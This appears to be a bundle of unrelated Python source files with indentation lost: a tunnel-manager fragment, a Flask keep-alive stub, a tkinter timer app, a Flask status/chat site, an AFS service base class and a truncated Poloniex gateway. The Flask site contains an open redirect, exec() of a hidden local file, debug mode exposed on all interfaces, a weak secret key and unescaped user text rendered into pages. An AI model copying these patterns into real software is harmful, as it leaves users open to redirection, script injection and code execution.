tunnel_process = TunnelProcess.from_config_file(config_file, alert_senders)
except Exception as e:
logger.exception("Failed to create connector from file %s: %s", config_file, e)
for pr in processes.values():
pr.terminate()
sys.exit(1)
processes[each] = tunnel_process
def get_post_alert_sender(logger, tunnel_manager_id, params):
if params.get("http_url"):
try:
post_sender = HTTPPostAlertSender(tunnel_manager_id, params['http_url'], params['http_user'],
params['http_password'], logger)
except KeyError as e:
logger.exception("Missing smtp param %s" % e)
sys.exit(-1)
else:
post_sender = None
return post_sender
def get_smtp_alert_sender(logger, tunnel_manager_id, params):
if params.get("smtp_hostname"):
try:
smtp_sender = EmailAlertSender(tunnel_manager_id, params['smtp_hostname'], params.get('smtp_login', None),
params.get('smtp_password', None),
params['smtp_to'], logger,
port=params.getint('smtp_port', 25), from_address=params.get('smtp_from'),
security=params.get("smtp_security"))
except KeyError as e:
logger.exception("Missing smtp param %s" % e)
sys.exit(-1)
else:
smtp_sender = None
return smtp_sender
if __name__ == '__main__':
main()
|
alive.py
|
#This file is used to keep the bot alive on replit server
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Bot started! Running..."
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
main.py
|
# TimerX v1.1
# IMPORTS
ver = "1.0"
import ctypes
import os
import time
import tkinter
import webbrowser
from platform import system
from re import T
from threading import Thread
from time import sleep
from tkinter import DISABLED, Frame, Grid, PhotoImage, StringVar, TclError, Tk, ttk
from tkinter.constants import LEFT
import darkdetect
import sv_ttk
from BlurWindow.blurWindow import *
from playsound import playsound
from utils import *
# CONFIG
theme = f"{darkdetect.theme()}"
if not os.path.isfile("./config.json"):
from utils import *
createConfig()
config = loadConfig(ver)
else:
config = loadConfig(ver)
if config["theme"] == "System":
if darkdetect.theme() == "Dark":
theme = "Dark"
else:
theme = "Light"
elif config["theme"] == "Dark":
theme = "Dark"
else:
theme = "Light"
# TKINTER WINDOW
app = Tk()
app.title("TimerX")
app.minsize(width=300, height=210)
sv_ttk.set_theme(theme.lower())
bg_color = ttk.Style().lookup(".", "background")
app.wm_attributes("-transparent", bg_color)
app.update()
HWND = ctypes.windll.user32.GetForegroundWindow()
# SYSTEM CODE
try:
if system() == "darwin":
app.iconbitmap(r"assets/logo_new.icns")
app.wm_attributes("-transparent", True)
app.config(bg="systemTransparent")
elif system() == "Windows":
app.iconbitmap(r"assets/logo_new.ico")
from win10toast_click import ToastNotifier
elif system() == "win":
app.iconphoto(r"assets/logo_new.ico")
else:
logo_img = PhotoImage(file="assets/images/logo_new.png")
app.iconphoto(False, logo_img)
except TclError:
pass
try:
app.iconphoto(r"assets/logo.ico")
except TclError:
pass
# VARIABLES
app_on = True
timer_on = False
timer_paused = False
timer_seconds = config["default_seconds"]
timer_minutes = config["default_minutes"]
timer_hours = config["default_hours"]
# FUNCTIONS
def playBuzzer(config):
playsound(config["sound_path"])
def startstopButtonPressed():
global timer_on, timer_paused, timer_hours, timer_minutes, timer_seconds, last_paused
if timer_on and timer_paused == False:
timer_on = False
timer_paused = True
last_paused = time.time()
timer_hours = hours_left
timer_minutes = minutes_left
timer_seconds = seconds_left
play_button.configure(text="Play")
elif timer_paused == False and timer_on == False:
play_button.configure(text="Pause")
timer_thread = Thread(target=runTimer, daemon=True)
timer_thread.start()
else:
timer_paused = False
timer_on = True
play_button.configure(text="Pause")
def saveTimer(timer_sec_input, timer_min_input, timer_hr_input, manager_app_window):
global timer_seconds, timer_minutes, timer_hours
timer_seconds = int(timer_sec_input.get())
timer_minutes = int(timer_min_input.get())
timer_hours = int(timer_hr_input.get())
config["default_seconds"] = timer_seconds
config["default_minutes"] = timer_minutes
config["default_hours"] = timer_hours
time_selected_display.configure(
text=f"{timer_hours} Hours, {timer_minutes} Minutes, {timer_seconds} Seconds"
)
time_display.configure(text=f"{timer_hours} : {timer_minutes} : {timer_seconds}")
manager_app_window.destroy()
def showNotification():
if system() == "Windows":
notification = ToastNotifier()
notification.show_toast(
"TimerX",
"Time's up!",
icon_path="./assets/logo_new.ico",
duration="None",
threaded=True,
callback_on_click=app.focus_force(),
)
def runTimer():
global timer_seconds, timer_minutes, timer_hours, timer_on, app, config, last_paused, seconds_left, minutes_left, hours_left
timer_seconds = config["default_seconds"]
timer_minutes = config["default_minutes"]
timer_hours = config["default_hours"]
seconds_left = timer_seconds
minutes_left = timer_minutes
hours_left = timer_hours
milliseconds_left = 99
timer_on = True
last_paused = time.time()
while True:
if timer_on and timer_paused == False:
latest_time = time.time()
time_to_subtract = round((latest_time - last_paused), 3)
split_time = str(time_to_subtract).split(".")
ty_res = time.gmtime(int(split_time[0]))
formatted_time = time.strftime(f"%H:%M:%S:{split_time[1]}", ty_res)
milliseconds_left -= int(split_time[1])
split_fmt_time = formatted_time.split(":")
hours_left = timer_hours - int(split_fmt_time[0])
minutes_left = timer_minutes - int(split_fmt_time[1])
seconds_left = timer_seconds - int(split_fmt_time[2])
if seconds_left < 0 and minutes_left == 0 and hours_left == 0:
break
if seconds_left < 0:
subtract_secs = abs(seconds_left)
seconds_left = 60 - subtract_secs
minutes_left -= 1
if minutes_left < 0:
subtract_mins = abs(minutes_left)
minutes_left = 60 - subtract_mins
hours_left -= 1
time_display.configure(
text=f"{hours_left} : {minutes_left} : {seconds_left}"
)
timer_on = False
play_button.config(text="Play")
if config["notify"]:
showNotification()
if config["sound"]:
playBuzzer(config)
def setAlwaysOnTop(app):
global config
if config["ontop"] == True:
app.attributes("-topmost", True)
else:
app.attributes("-topmost", False)
setAlwaysOnTop(app)
# WINDOWS
def createManagerWindow(saveTimer, current_mins, current_secs, current_hrs):
global manager_app_window, config
manager_app_window = tkinter.Toplevel()
manager_app_window.geometry("250x170")
manager_app_window.title("Edit Timer")
manager_app_window.attributes("-alpha", config["transperency"])
manager_app_window.resizable(False, False)
try:
if system() == "darwin":
manager_app_window.iconbitmap(r"assets/logo_new.icns")
manager_app_window.wm_attributes("-transparent", True)
manager_app_window.config(bg="systemTransparent")
elif system() == "Windows":
manager_app_window.iconbitmap(r"assets/logo_new.ico")
elif system() == "win":
manager_app_window.iconphoto(r"assets/logo_new.ico")
else:
logo_img = PhotoImage(file="assets/images/logo.png")
manager_app_window.iconphoto(False, logo_img)
except TclError:
pass
# VALIDATION
validate_command = manager_app_window.register(validate)
# WINDOW FRAME
manager_window = ttk.Frame(manager_app_window)
manager_window.pack(fill="both", expand=True)
timer_hr_label = ttk.Label(manager_window, text="Hours: ")
timer_hr_label.place(x=17, y=17)
timer_hr_input = ttk.Entry(
manager_window, validate="key", validatecommand=(validate_command, "%P")
)
timer_hr_input.place(x=65, y=10)
timer_hr_input.insert(1, current_hrs)
timer_min_label = ttk.Label(manager_window, text="Minutes: ")
timer_min_label.place(x=13, y=57)
timer_min_input = ttk.Entry(
manager_window, validate="key", validatecommand=(validate_command, "%P")
)
timer_min_input.place(x=65, y=50)
timer_min_input.insert(1, current_mins)
timer_sec_label = ttk.Label(manager_window, text="Seconds: ")
timer_sec_label.place(x=12, y=97)
timer_sec_input = ttk.Entry(
manager_window, validate="key", validatecommand=(validate_command, "%P")
)
timer_sec_input.place(x=65, y=90)
timer_sec_input.insert(1, current_secs)
ok_button = ttk.Button(
manager_window,
text="Ok!",
command=lambda: saveTimer(
timer_sec_input, timer_min_input, timer_hr_input, manager_app_window
),
style="Accent.TButton",
)
ok_button.place(x=95, y=126)
def createSettingsWindow():
global theme, config, settings_window
settings_window = tkinter.Toplevel()
settings_window.geometry("500x320")
settings_window.title("Settings")
settings_window.resizable(False, False)
settings_window.attributes("-alpha", config["transperency"])
try:
if system() == "darwin":
settings_window.iconbitmap(r"assets/logo_new.icns")
settings_window.wm_attributes("-transparent", True)
settings_window.config(bg="systemTransparent")
elif system() == "Windows":
settings_window.iconbitmap(r"assets/logo_new.ico")
elif system() == "win":
settings_window.iconphoto(r"assets/logo_new.ico")
else:
logo_img = PhotoImage(file="assets/images/logo_new.png")
settings_window.iconphoto(False, logo_img)
except TclError:
pass
theme_dark = PhotoImage(file="./assets/images/dark/dark_theme.png")
theme_light = PhotoImage(file="./assets/images/light/dark_theme.png")
transparency_dark = PhotoImage(file="./assets/images/dark/transparency.png")
transparency_light = PhotoImage(file="./assets/images/light/transparency.png")
speaker_dark = PhotoImage(file="./assets/images/dark/speaker.png")
speaker_light = PhotoImage(file="./assets/images/light/speaker.png")
bell_dark = PhotoImage(file="./assets/images/dark/bell.png")
bell_light = PhotoImage(file="./assets/images/light/bell.png")
pin_dark = PhotoImage(file="./assets/images/dark/pin.png")
pin_light = PhotoImage(file="./assets/images/light/pin.png")
github_logo_dark = PhotoImage(file="./assets/images/dark/github.png")
github_logo_light = PhotoImage(file="./assets/images/light/github.png")
globe_dark = PhotoImage(file="./assets/images/dark/globe.png")
globe_light = PhotoImage(file="./assets/images/light/globe.png")
tabview = ttk.Notebook(settings_window)
tabview.pack(fill="both", expand=True)
tab_1 = ttk.Frame(tabview)
tab_2 = ttk.Frame(tabview)
tab_3 = ttk.Frame(tabview)
tabview.add(tab_1, text="Appearence")
tabview.add(tab_2, text="Notifications & Sound")
tabview.add(tab_3, text="About")
theme_label = ttk.Label(
tab_1,
text=" Change theme of the app",
image=theme_dark,
compound=LEFT,
)
theme_label.place(x=23, y=23)
transparency_label = ttk.Label(
tab_1,
text=" Adjust Transparency of the app",
image=transparency_dark,
compound=LEFT,
)
transparency_label.place(x=23, y=73)
speaker_label = ttk.Label(
tab_2,
text=" Play sound when timer ends",
image=speaker_dark,
compound=LEFT,
)
speaker_label.place(x=23, y=23)
bell_label = ttk.Label(
tab_2,
text=" Show notification when timer ends",
image=bell_dark,
compound=LEFT,
)
bell_label.place(x=23, y=73)
pin_label = ttk.Label(
tab_1, text=" Keep app always on top", image=pin_dark, compound=LEFT
)
pin_label.place(x=23, y=123)
logo = PhotoImage(file="./assets/logo_new_150x150.png")
logo_label = ttk.Label(tab_3, image=logo)
logo_label.place(x=50, y=30)
TimerX_Label = ttk.Label(tab_3, text="TimerX", font=("Arial Rounded MT Bold", 50))
TimerX_Label.place(x=210, y=40)
version_Label = ttk.Label(tab_3, text=f"Version: {ver}", font=("Segoe UI", "20"))
version_Label.place(x=220, y=120)
github_btn = ttk.Button(
tab_3,
text=" Fork on Github",
image=github_logo_dark,
compound=LEFT,
command=lambda: webbrowser.open("https://github.com/Futura-Py/TimerX"),
)
github_btn.place(x=50, y=200)
website_btn = ttk.Button(
tab_3,
text=" Check out our Website!",
image=globe_dark,
compound=LEFT,
command=lambda: webbrowser.open("https://Futura-Py.netlify.app/"),
)
website_btn.place(x=250, y=200)
if theme == "Dark":
github_btn.configure(image=github_logo_dark)
website_btn.configure(image=globe_dark)
elif theme == "Light":
github_btn.configure(image=github_logo_light)
website_btn.configure(image=globe_light)
if theme == "Dark":
theme_label.configure(image=theme_dark)
transparency_label.configure(image=transparency_dark)
speaker_label.configure(image=speaker_dark)
bell_label.configure(image=bell_dark)
pin_label.configure(image=pin_dark)
github_btn.configure(image=github_logo_dark)
website_btn.configure(image=globe_dark)
else:
theme_label.configure(image=theme_light)
transparency_label.configure(image=transparency_light)
speaker_label.configure(image=speaker_light)
bell_label.configure(image=bell_light)
pin_label.configure(image=pin_light)
github_btn.configure(image=github_logo_light)
website_btn.configure(image=globe_light)
box_slider_value = StringVar(settings_window)
if config["theme"] == "System":
box_slider_value.set("System")
elif theme == "Dark":
box_slider_value.set("Dark")
elif theme == "Light":
box_slider_value.set("Light")
theme_combobox = ttk.Spinbox(
tab_1,
state="readonly",
values=("Dark", "Light", "System"),
wrap=True,
textvariable=box_slider_value,
)
theme_combobox.place(x=275, y=20)
slider_value = tkinter.DoubleVar()
didsliderload = False
def slider_value():
return ".{:.0f}".format(slider.get())
def slider_changed(event):
if didsliderload:
settings_window.attributes("-alpha", slider_value())
app.attributes("-alpha", slider_value())
slider = ttk.Scale(
tab_1,
from_=25,
to=99,
orient="horizontal",
command=slider_changed,
variable=slider_value,
)
slider.set(str(config["transperency"]).lstrip("."))
slider.place(x=325, y=75)
didsliderload = True
sound_button = ttk.Checkbutton(tab_2, style="Switch.TCheckbutton")
if config["sound"] == True:
sound_button.state(["!alternate", "selected"])
elif config["sound"] == False:
sound_button.state(["!alternate"])
sound_button.place(x=360, y=25)
notify_button = ttk.Checkbutton(tab_2, style="Switch.TCheckbutton")
if config["notify"] == True:
notify_button.state(["!alternate", "selected"])
elif config["notify"] == False:
notify_button.state(["!alternate"])
notify_button.place(x=360, y=75)
###
ontop_button = ttk.Checkbutton(tab_1, style="Switch.TCheckbutton")
if config["ontop"] == True:
ontop_button.state(["!alternate", "selected"])
elif config["ontop"] == False:
ontop_button.state(["!alternate"])
ontop_button.place(x=360, y=125)
def ApplyChanges():
global theme
config["theme"] = theme_combobox.get()
if config["theme"] == "System":
if darkdetect.isDark():
theme = "Dark"
else:
theme = "Light"
else:
theme = config["theme"]
config["transperency"] = slider_value()
config["sound"] = sound_button.instate(["selected"])
config["notify"] = notify_button.instate(["selected"])
config["ontop"] = ontop_button.instate(["selected"])
setAlwaysOnTop(app)
saveConfig(config)
if theme == "Dark":
settings_btn.configure(image=settings_image_dark)
time_display.configure(fg="white")
time_selected_display.configure(fg="white")
elif theme == "Light":
settings_btn.configure(image=settings_image_light)
time_display.configure(fg="black")
time_selected_display.configure(fg="black")
sv_ttk.set_theme(theme.lower())
settings_window.destroy()
okbtn = ttk.Button(
tab_1,
text="Apply Changes",
command=lambda: ApplyChanges(),
style="Accent.TButton",
)
okbtn.place(x=250, y=230)
cancelbtn = ttk.Button(
tab_1, text="Cancel", command=lambda: settings_window.destroy()
)
cancelbtn.place(x=125, y=230)
okbtn_2 = ttk.Button(
tab_2,
text="Apply Changes",
command=lambda: ApplyChanges(),
style="Accent.TButton",
)
okbtn_2.place(x=250, y=230)
cancelbtn_2 = ttk.Button(
tab_2, text="Cancel", command=lambda: settings_window.destroy()
)
cancelbtn_2.place(x=125, y=230)
if system() != "Windows" or system() != "win":
notify_button.configure(state=DISABLED)
settings_window.mainloop()
# APP TRANSPERENCY
app.attributes("-alpha", config["transperency"])
# KEYBINDS
app.bind("key-space", startstopButtonPressed)
Grid.rowconfigure(app, 0, weight=1)
Grid.columnconfigure(app, 1, weight=1)
Grid.rowconfigure(app, 2, weight=1)
# IMAGES
settings_image_light = PhotoImage(file=f"./assets/images/light/settings.png")
settings_image_dark = PhotoImage(file=f"./assets/images/dark/settings.png")
# WINDOW FRAME
window = Frame(app)
# WINDOW ELEMENTS
time_selected_display = tkinter.Label(
master=app,
text=f"{timer_hours} Hours, {timer_minutes} Minutes, {timer_seconds} Seconds",
font=("Segoe UI Variable", 10),
bg=bg_color,
fg="white",
)
time_selected_display.grid(column=1, row=0, sticky="N", pady=10)
time_display = tkinter.Label(
master=app,
text=f"{timer_hours} : {timer_minutes} : {timer_seconds}",
font=("Segoe UI Variable", 30),
bg=bg_color,
fg="white",
)
time_display.grid(column=1, row=0, sticky="", rowspan=2, pady=20)
play_button = ttk.Button(
master=app,
text="Play",
width=25,
command=startstopButtonPressed,
style="Accent.TButton",
)
play_button.grid(column=1, row=0, sticky="S", rowspan=2)
manager_button = ttk.Button(
master=app,
text="Edit Timer",
command=lambda: createManagerWindow(
saveTimer, timer_minutes, timer_seconds, timer_hours
),
width=25,
)
manager_button.grid(column=1, row=2, sticky="N", pady=10)
settings_btn = ttk.Button(
master=app,
image=settings_image_dark,
command=lambda: createSettingsWindow(),
style="Toolbutton",
)
def sizechanged(e):
settings_btn.place(x=5, y=app.winfo_height() - 45)
if app.winfo_height() >= 220:
if app.winfo_height() > 250:
if app.winfo_height() > 270:
if app.winfo_height() > 290:
if app.winfo_height() > 330:
if app.winfo_height() > 350:
if app.winfo_height() > 370:
if app.winfo_height() > 390:
if app.winfo_width() > 420:
time_display.configure(
font=("Segoe UI Variable", 100)
)
time_selected_display.configure(
font=("Segoe UI Variable", 25)
)
else:
if app.winfo_width() > 420:
time_display.configure(
font=("Segoe UI Variable", 90)
)
time_selected_display.configure(
font=("Segoe UI Variable", 25)
)
else:
if app.winfo_width() > 400:
time_display.configure(font=("Segoe UI Variable", 80))
time_selected_display.configure(
font=("Segoe UI Variable", 25)
)
else:
if app.winfo_width() > 360:
time_display.configure(font=("Segoe UI Variable", 70))
time_selected_display.configure(
font=("Segoe UI Variable", 23)
)
else:
if app.winfo_width() > 360:
time_display.configure(font=("Segoe UI Variable", 60))
time_selected_display.configure(font=("Segoe UI Variable", 20))
else:
if app.winfo_width() >= 300:
time_display.configure(font=("Segoe UI Variable", 50))
time_selected_display.configure(font=("Segoe UI Variable", 17))
else:
if app.winfo_width() >= 300:
time_display.configure(font=("Segoe UI Variable", 40))
time_selected_display.configure(font=("Segoe UI Variable", 13))
else:
time_display.configure(font=("Segoe UI Variable", 30))
time_selected_display.configure(font=("Segoe UI Variable", 10))
play_button.configure(width=int(app.winfo_width() / 12))
manager_button.configure(width=int(app.winfo_width() / 12))
# THEMED IMAGES
if theme == "Dark":
settings_btn.configure(image=settings_image_dark)
GlobalBlur(HWND, Acrylic=True, Dark=True)
elif theme == "Light":
settings_btn.configure(image=settings_image_light)
GlobalBlur(HWND, Acrylic=True, hexColor=f"{bg_color}")
time_display.configure(fg="black")
time_selected_display.configure(fg="black")
app.bind("<Configure>", sizechanged)
# UPDATE
checkForUpdates(ver)
# TKINTER MAINLOOP
app.mainloop()
|
web.py
|
import os
import json
import yaml
import time
import flask
import distro
import psutil
import random
import string
import threading
import jinja2.exceptions
from flask import request
from turbo_flask import Turbo
from datetime import datetime
try:
from mcipc.query import Client
except: # server offline
pass
from html import escape, unescape
app = flask.Flask(__name__, static_url_path='/')
app.secret_key = random.sample('ABCDEF0123456789', 6)
turbo = Turbo(app)
view_urls = {}
SERVER_NAME = 'paper'
@app.route('/x/<path:subpath>')
def show_subpath(subpath):
return f'Subpath {escape(subpath)}'
@app.route('/')
def home():
return flask.render_template('index.html')
@app.errorhandler(jinja2.exceptions.TemplateNotFound)
def template_not_found(error):
redirects = yaml.load(open('redirects.yml'), Loader=yaml.FullLoader)
path = error.name.replace('.html', '')
if path in redirects.keys():
list(flask.request.args.keys())[0] if flask.request.args.keys() else False
return flask.redirect(redirects[path])
return flask.render_template(f'error.html', title='Page not found!', description=f'Couldn\'t find this website: {error.name}')
@app.errorhandler(404)
def error_404(error):
return flask.render_template(f'error.html', title='File not found!', description=f'Couldn\'t find this file.')
@app.route('/view-create', methods=['GET', 'POST'])
def create_page():
global view_urls
if request.method == 'GET':
return flask.render_template(f'error.html', title='Unsupported request method!', description=f'This website can\'t be viewed with GET, as it\'s supposed to be POSTed.')
code = ''.join(random.sample(string.ascii_lowercase + string.ascii_uppercase + string.digits, 5))
view_urls[code] = request.get_json()
return f'https://onlix.me/view/{code}'
def fix_formatting(text: str):
return text.replace(' ', ' ').replace('\n', '\n<br>\n')
@app.route('/view/<code>')
def view_page(code):
global view_urls
if not view_urls.get(code):
return flask.render_template(f'error.html', title='View page not found!', description=f'Couldn\'t find this code: {code}')
return flask.render_template(f'view.html', title=fix_formatting(unescape(view_urls[code]['title'])), text=fix_formatting(unescape(view_urls[code]['text'])))
def readable_size(size):
return round(size/1000000000, 1)
@app.route('/status')
def status_page():
ram = psutil.virtual_memory()
disk = psutil.disk_usage('/')
return flask.render_template(f'status.html',
cpu=psutil.cpu_percent(),
cpus=psutil.cpu_count(),
threads=psutil.cpu_count(logical=False),
ram=f'{readable_size(ram[3])}/{readable_size(ram[0])} GB ({ram[2]}%)',
disk=f'{readable_size(disk[1])}/{readable_size(disk[0])} GB ({disk[3]}%)',
pids=len(psutil.pids()),
boot_days=round((time.time()-psutil.boot_time())/86400),
os=f'{distro.linux_distribution()[0]} {distro.linux_distribution()[1]}',
)
@app.route('/status/mc')
def status_mc():
ops = [x['name'] for x in json.loads(open(f'/home/minecraft/{SERVER_NAME}/ops.json').read())]
bans = [x['name'] for x in json.loads(open(f"/home/minecraft/{SERVER_NAME}/banned-players.json").read())]
ip_bans = [x['name'] for x in json.loads(open(f"/home/minecraft/{SERVER_NAME}/banned-ips.json").read())]
whitelist = [x['name'] for x in json.loads(open(f'/home/minecraft/{SERVER_NAME}/whitelist.json').read())]
last_players = [x['name'] for x in json.loads(open(f'/home/minecraft/{SERVER_NAME}/usercache.json').read())[:5]]
with Client('127.0.0.1', 25565) as client:
server_data = client.stats(full=True)
plugin_list = list(server_data.plugins.values())[0]
return flask.render_template(f'status_mc.html',
players=server_data.players,
player_count=f'{server_data.num_players}/{server_data.max_players}' if server_data else '0/0',
version=server_data.version if server_data else 'Offline',
game_type=server_data.game_type if server_data else 'Server is not avaiable',
last_player=last_players,
last_players=len(last_players),
whitelist=whitelist,
whitelisted=len(whitelist),
plugin=plugin_list,
plugins=len(plugin_list),
op=ops,
ops=len(ops),
normal_ban=bans,
ip_ban=ip_bans,
normal_bans=len(bans),
ip_bans=len(ip_bans)
)
@app.route('/red')
def red(*args, **kwargs):
try:
return flask.redirect(unescape(list(flask.request.args.keys())[0]))
except IndexError:
return flask.redirect('/')
@app.route('/mc-console-log')
def mc_console_log():
log = []
lines = open(f'/home/minecraft/{SERVER_NAME}/.console_history').read().split('\n')[:-1]
for line in lines:
line_date = line.split(':')[0]
line_command = line.split(':')[1]
for x in ['w', 'msg', 'teammsg', 'tell']:
if line_command.startswith(x):
line_command = f'{x} [CENSORED]'
if line_command.startswith('ban-ip '):
line_command = 'ban-ip [CENSORED IP]'
if line_command.startswith('pardon-ip'):
line_command = 'pardon-ip [CENSORED IP]'
line_date = datetime.fromtimestamp(int(line_date)//1000).strftime('%d.%m.%y %H:%M:%S')
log.append({'time': line_date, 'command': line_command})
log.reverse()
return flask.render_template(f'mcclog.html', log=log, server_name=SERVER_NAME)
def read_chat(channel=None):
data = yaml.load(open('chats.yml'), Loader=yaml.FullLoader)
data = data or {}
return data.get(channel) or data
def send_message(channel, user='Guest', text=''):
chat = read_chat()
if not chat.get(channel):
chat[channel] = []
chat[channel].append({'user': user, 'text': text})
yaml.dump(chat, open('chats.yml', 'w'), sort_keys=False, default_flow_style=False)
@app.route('/chat/<channel>', methods=['GET', 'POST'])
def chat_channel(channel):
if flask.request.form.to_dict().get('message'):
send_message(channel, flask.request.args.get('from') or 'Guest', flask.request.form.to_dict().get('message'))
if not read_chat(channel):
return flask.render_template(f'chat_error.html')
return flask.render_template(f'chat.html', channel=channel, messages=reversed(read_chat(channel)))
@app.before_first_request
def before_first_request():
threading.Thread(target=update_load).start()
def update_load():
with app.app_context():
while True:
time.sleep(5)
turbo.push(turbo.replace(flask.render_template('chat.html'), 'load'))
# @app.before_first_request
# def before_first_request():
# threading.Thread(target=update_load).start()
# def update_load():
# with app.app_context():
# while True:
# time.sleep(5)
# turbo.push(turbo.replace(flask.render_template('chat.html'), 'load'))
### RUN CLOSED SOURCE ###
exec(open('closed.hidden.py').read())
### ================= ###
if __name__ == '__main__':
app.run(host='0.0.0.0', port=2021, debug=True)
|
BaseService.py
|
#import inspect
import logging
import random
import string
import threading
from afs.util.AFSError import AFSError
import afs
import sys
class BaseService(object):
"""
Provides implementation for basic methods for all Services.
"""
def __init__(self, conf=None, LLAList=[]):
# CONF INIT
if conf:
self._CFG = conf
else:
self._CFG = afs.CONFIG
# LOG INIT
classLogLevel = getattr(self._CFG,"LogLevel_%s" % self.__class__.__name__, "").upper()
numericLogLevel = getattr(logging,classLogLevel, 0)
self.Logger=logging.getLogger("afs.service.%s" % self.__class__.__name__)
self.Logger.setLevel(numericLogLevel)
self.Logger.debug("initializing %s-Object with conf=%s" % (self.__class__.__name__, self._CFG))
# DB INIT
if self._CFG.DB_CACHE :
from afs.util.DBManager import DBManager
self.DBManager=DBManager()
else : # this is a simple object raising an error if called.
from afs.util.NODBManager import NODBManager
self.DBManager=NODBManager()
# LLA INIT
for lla in LLAList :
if lla == "vl":
from afs.lla.VLDBLLA import VLDBLLA
self._vlLLA = VLDBLLA()
elif lla == "vol" :
from afs.lla.VolServerLLA import VolServerLLA
self._volLLA = VolServerLLA()
elif lla == "bos" :
from afs.lla.BosServerLLA import BosServerLLA
self._bosLLA = BosServerLLA()
elif lla == "fs" :
from afs.lla.FileServerLLA import FileServerLLA
self._fsLLA = FileServerLLA()
elif lla == "rx" :
from afs.lla import RXPeerLLA
self._rxLLA = RXPeerLLA.RXPeerLLA()
elif lla == "ubik" :
from afs.lla import UbikPeerLLA
self._ubikLLA = UbikPeerLLA.UbikPeerLLA()
else :
raise AFSError("internal Error. invalid LLA '%s' requested" % lla)
# Async INIT
# list of active threads in this service
self.active_tasks={}
self.task_results={}
def wait_for_task(self, task_name) :
self.Logger.debug("task_results=%s" % self.task_results)
self.active_tasks[task_name].join()
return
def get_task_result(self, task_name) :
self.Logger.debug("task_results=%s" % self.task_results)
return self.task_results.pop(task_name)
def do_return(self, thread_name, result) :
"""
Either just return the result or write it into self.task_results,
depending on if we are async or not.
"""
if thread_name == "" :
return result
else :
self.task_results[thread_name] = result
return thread_name
def get_thread_name(self) :
"""
return a new unique thread-name
"""
new_name = ""
while new_name == "" or new_name in self.active_tasks :
new_name = ""
i = 0
while ( i < 8 ) :
new_name += random.choice(string.letters + string.digits)
i += 1
return new_name
def get_archived(self, historic_class, earliest=None, latest=None, limit=-1, **filter_dict) :
"""
mapped_object has to be declared in the specific service itself.
return list of mapped objects from the archive
"""
query = self.DBManager.DbSession.query(historic_class).filter_by(**filter_dict)
if earliest != None :
query = query.filter( historic_class.db_creation_date > earliest)
if latest != None :
query = query.filter( historic_class.db_creation_date < latest)
if limit == -1 :
archived_objs = query.all()
else :
archived_objs = query.limit(limit)
return archived_objs
def task_wrapper(method) :
"""
This decorator is meant for either calling a method directly
or execute it in a different thread.
"""
def wrapped(self, *args, **kwargs):
"""actual wrapper code"""
if not kwargs.has_key("async") :
kwargs["async"] = False
async = kwargs["async"]
# get cmdlist and parsefunction from method
# parse_fct is parsing the output of the executed function
# ParseInfo are any info the parse_fct requires beside ret,
# outout and outerr
#parse_parameterlist = {"args" : args, "kwargs" : kwargs }
#argspec = inspect.getargspec(method)
#self.Logger.debug("argspec=%s" % (argspec,))
#count = 0
#if argspec[3] != None :
# for key in argspec[0][-len(argspec[3]):] :
# self.Logger.debug("checking argspec key=%s" % key)
# value = argspec[3][count]
# self.Logger.debug("value=%s" % value)
# count += 1
# if not parse_parameterlist["kwargs"].has_key(key) :
# parse_parameterlist["kwargs"][key] = value
self.Logger.debug("args=%s" % (args,))
self.Logger.debug("kwargs=%s" % (kwargs,))
if async :
this_thread_name = self.get_thread_name()
kwargs["_thread_name"] = this_thread_name
this_thread = threading.Thread(name=this_thread_name, target=method, args=(self, ) + args, kwargs=kwargs)
this_thread.start()
self.active_tasks[this_thread_name]=this_thread
return this_thread_name
else :
return method(self, *args, **kwargs)
return wrapped
|
poloniex.py
|
from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.util import Logger
from befh.instrument import Instrument
from befh.clients.sql_template import SqlClientTemplate
from functools import partial
from datetime import datetime
import threading
import time
class ExchGwApiPoloniex(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self, proxy=None):
self.proxy = proxy
RESTfulApiSocket.__init__(self, proxy=proxy)
@classmethod
def get_trades_timestamp_field_name(cls):
return 'date'
@classmethod
def get_trades_timestamp_format(cls):
return '%Y-%m-%d %H:%M:%S'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'type'
@classmethod
def get_trade_id_field_name(cls):
return 'tradeID'
@classmethod
def get_trade_price_field_name(cls):
return 'rate'
@classmethod
def get_trade_volume_field_name(cls):
return 'amount'
@classmethod
def get_order_book_link(cls, instmt):
return "https://poloniex.com/public?command=returnOrderBook¤cyPair=%s&depth=5" % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
if instmt.get_last_trade() is not None:
return "https://poloniex.com/public?command=returnTradeHistory¤cyPair=%s&start=%d" % \
(instmt.get_instmt_code(), int(instmt.get_last_trade().update_date_time.timestamp()) - 1)
else:
return "https://poloniex.com/public?command=returnTradeHistory¤cyPair=%s" % \
(instmt.get_instmt_code())
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
keys = list(raw.keys())
if cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
# Date time
l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
bids = sorted(bids, key=lambda x: x[0], reverse=True)
for i in range(0, 5):
l2_depth.bids[i].price = float(bids[i][0]) if not isinstance(bids[i][0], float) else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if not isinstance(bids[i][1], float) else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
asks = sorted(asks, key=lambda x: x[0])
for i in range(0, 5):
l2_depth.asks[i].price = float(asks[i][0]) if not isinstance(asks[i][0], float) else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if not isinstance(asks[i][1], float) else asks[i][1]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
